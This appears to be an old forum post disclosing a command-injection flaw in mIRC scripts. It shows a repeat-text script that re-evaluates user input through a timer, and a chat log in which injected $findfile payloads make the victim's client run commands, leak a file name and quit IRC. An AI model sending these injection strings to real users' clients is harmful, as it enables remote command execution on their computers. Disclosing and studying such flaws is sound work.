I have found an exploit that will allow a hacker to take over somebody's mIRC, allowing them to run files, make the user quit irc, or anything else...it involves the use of $findfile. We found it by testing a remote webserver code I was working on with sockets, making sure it was secure. We stumble across $findfile and decide to test. Sure enough it allowed us to do all kinds of stuff to each other. I tested on a lower basis with the following code that simply repeats what a user says
on 1:text:*:#:{
if ($1 == !makemesay) && ($chan == #temp) {
set %two $2-
timer 1 1 msg #temp $nick made me say %two
}
}
nobody would even think that to be exploitable...
<Qb2> !makemesay woof
<Qb_Master> Qb2 made me say woof
<Qb2> !makemesay $findfile(c:\,*,3,1,msg #temp test)
<Qb_Master> test
<Qb_Master> Qb2 made me say c:\autoexec.bat <we'll just say that's the 3rd file in c:\ in this case>
<Qb2> !makemesay $findfile(c:\,*,3,1,quit HACKED!)
* Qb_Master has quit irc (quit: HACKED!)
Many many many people have commands that repeat text like that, and somebody with this knowledge, with that code, basically has complete control over that user's computer!
PLEASE reply back to this message, it's an urgent glitch, if used with sockets it can also allow this anonymously making it even worse!.
